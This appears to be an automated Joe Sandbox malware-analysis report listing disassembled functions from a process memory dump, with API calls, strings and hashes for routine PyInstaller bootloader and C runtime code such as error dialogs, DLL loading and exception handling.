Part of subcall function 00007FF69436FA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF69436FA6F
Part of subcall function 00007FF69436FA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF69436FA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF69436EBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF69436EDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF69436EF08

Strings

csm, xrefs: 00007FF69436EBD0
csm, xrefs: 00007FF69436EAEF
csm, xrefs: 00007FF69436EB56

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: c486dad9c05d8cdaf301deaaaed40cbe5c3140edf7d59c87d9ecfd8de4fe6594
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: D2D180729087428AEB309B76D4833AD37A4FB45798F108179EE8D97B9ADF38E455C700

Function 00007FF694362C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362D63
MessageBoxW.USER32 ref: 00007FF694362D99

Strings

Error, xrefs: 00007FF694362D8C
<FormatMessageW failed.>, xrefs: 00007FF694362D70
[PYI-%d:ERROR] , xrefs: 00007FF694362CA6
%ls: , xrefs: 00007FF694362D22

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: 649b692ec7860ba4d2938e5c25e096bf65b030219bf8595977c55acd525289bf
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: A331C962708A4252E630AB37A8952AA76A5FF84794F418139EF4DD3799DF3CD506C700

Function 00007FF69436DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DDBD
GetLastError.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DDF5
FreeLibrary.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DE63
GetProcAddress.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DE6F

Strings

api-ms-, xrefs: 00007FF69436DDDD

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: 4e51e24897ab5e689e34f907e73ef028a1fa941d7c3d74bd6b039c1a6f81117a
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: 4131CD21B2A64391EE32DB23A8825B57394FF58BA0F598579ED1D8B394EF3CE444C314

Function 00007FF694366350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6943663F7
ucrtbase.dll, xrefs: 00007FF6943663CD
Failed to load Python DLL '%ls'., xrefs: 00007FF694366497
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF694366446
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6943663B7
LoadLibrary, xrefs: 00007FF69436649E

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction ID: 62e54395bb7fd12c43ef6a8c36fccbdd252edc5485441615264bfcb35107bb73
Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction Fuzzy Hash: F8418531A1CA8791EA31DB32E4A62E97321FF54384F90817AEA5DC3695EF3CE615C740

Function 00007FF694362A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF69436351A,?,00000000,00007FF694363F23), ref: 00007FF694362AA0

Strings

Warning, xrefs: 00007FF694362B1E
WARNING, xrefs: 00007FF694362AAF
Warning [ANSI Fallback], xrefs: 00007FF694362B0F
0, xrefs: 00007FF694362B16
[PYI-%d:%s] , xrefs: 00007FF694362AA8

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 6df2a56c3738d86e5d6a339276a50b68680bbf87c9199da9b85550d10549a381
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 15217172A1978292E6309B62B8817EA73A4FB88784F40417AFE8CC3759DF7CD545C740

Function 00007FF69437B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF69437B1CF
FlsGetValue.KERNEL32 ref: 00007FF69437B1E4
FlsSetValue.KERNEL32 ref: 00007FF69437B205
FlsSetValue.KERNEL32 ref: 00007FF69437B232
FlsSetValue.KERNEL32 ref: 00007FF69437B243
FlsSetValue.KERNEL32 ref: 00007FF69437B254
SetLastError.KERNEL32 ref: 00007FF69437B26F

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction ID: dfac49619780feb5d93848e7621fc4e5cfc3faa2b3d635ae4d3be7712b64e3f3
Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction Fuzzy Hash: F8211630A0E246C1FA7467739AD213D5162DF447A4F14C7BCEABED6AD6DE2CA441C300

Function 00007FF694387DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF694387E0D
GetLastError.KERNEL32 ref: 00007FF694387E19
CloseHandle.KERNEL32 ref: 00007FF694387E31
CreateFileW.KERNEL32 ref: 00007FF694387E5C
WriteConsoleW.KERNEL32 ref: 00007FF694387E7B

Strings

CONOUT$, xrefs: 00007FF694387E3D

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: 89c7e07bea03e281a3f6895b136475e7b3b963054bbb9bbe71837d890f7d4b54
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: 5A119621718A4286E7609B63E8D5329E2A0FB88FE4F148278E95DC77A4DF3CD804C740

Function 00007FF694368560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF694369216), ref: 00007FF694368592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF6943685E9

Part of subcall function 00007FF694369400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6943645E4,00000000,00007FF694361985), ref: 00007FF694369439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF694368678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF6943686E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF6943686F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF69436870A

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction ID: 1d260c8d88df7c3960d56c470f4246ca93e34f8170f56d9695635efa69ddb558
Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction Fuzzy Hash: 00418462B1968381E6349B33A5816AA7394FF88BC8F458179DF8DD7B89DE3CE501C700

Function 00007FF69437B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B347
FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B37D
FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3AA
FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3BB
FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3CC
SetLastError.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3E7

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction ID: e0e660be6139aedb7bc65fd876fe121ba12b3255fe05e402be53fa66be4464bb
Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction Fuzzy Hash: 14111530A0C642C2FA74A7739AD113D6192EF447A4F14C7BCE9AED67D6DE2CA481C701

Function 00007FF694362910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF694361B6A), ref: 00007FF69436295E

Strings

[PYI-%d:ERROR] , xrefs: 00007FF694362966
Error, xrefs: 00007FF694362A0E
%s: %s, xrefs: 00007FF6943629E8
Error [ANSI Fallback], xrefs: 00007FF6943629FF

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: 0140eb5a2f4093fad854a4630648e13eb0062c883a5c13996e8e5e456cd7bad8
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: 3231C962B1968292E7309773A8815EA7295FF887D4F408139FE8DC3755EF7CD546C600

Function 00007FF694362390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6943623C8
DialogBoxIndirectParamW.USER32 ref: 00007FF69436248E
DeleteObject.GDI32 ref: 00007FF6943624C1
DestroyIcon.USER32 ref: 00007FF6943624D3

Strings

Unhandled exception in script, xrefs: 00007FF6943623F8

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction ID: 5d38c67b2b2d211b82ec4a952f5596d4b307ef1577acbea10c63d916ea519da5
Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction Fuzzy Hash: 38315F7261968289EB30EB32E8952F97360FF89784F544179EA4D87B5ADF3CD104C700

Function 00007FF694362B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF69436918F,?,00007FF694363C55), ref: 00007FF694362BA0
MessageBoxW.USER32 ref: 00007FF694362C2A

Strings

WARNING, xrefs: 00007FF694362BAF
Warning, xrefs: 00007FF694362C1D
[PYI-%d:%ls] , xrefs: 00007FF694362BA8

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: 1ed238c28ff3441aacd5d3e953c375920b0b8e908db4c8850ad09c56c7be8d23
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: 5121A372708B4292E7209B26F8857AA73A4EB88780F40813AEA8DD7756DE3CD605C700

Function 00007FF694362710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF694361B99), ref: 00007FF694362760

Strings

Error, xrefs: 00007FF6943627DE
ERROR, xrefs: 00007FF69436276F
Error [ANSI Fallback], xrefs: 00007FF6943627CF
[PYI-%d:%s] , xrefs: 00007FF694362768

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: acb090b7fed5302f8a1616eebe57da262de0da86608b3f2e97c5dc219c5d32fa
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: 86217172A1978292E630DB62B8817EAB394EB88384F408179FA8CC3759DF7CD549C740

Function 00007FF694379AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF694379B1D
GetProcAddress.KERNEL32 ref: 00007FF694379B33
FreeLibrary.KERNEL32 ref: 00007FF694379B5A

Strings

CorExitProcess, xrefs: 00007FF694379B2C
mscoree.dll, xrefs: 00007FF694379B14

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 0d05e3bfdaf80de667f5b7547d690a6faa0e73dcae0319fba1f68cf6e2594ce4
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 05F0AF31A09A07C1FA248B32A4C53799320EF85761F5482BDD66EC62E4DF2CD044C300

Function 00007FF6943893D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF694389400
_set_statfp.LIBCMT ref: 00007FF69438941B
_set_statfp.LIBCMT ref: 00007FF694389437
_set_statfp.LIBCMT ref: 00007FF694389473

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: cf1cf84fd7519ef8d569f3edcb94ba82d80560a5becd3dfce82a468c10d313cf
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: FC11BF62E0CA1301FA769176D8D6375A044EF98360E24C6BCEB6FC73D6AE2CA941C100

Function 00007FF69437B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B41F
FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B43E
FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B466
FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B477
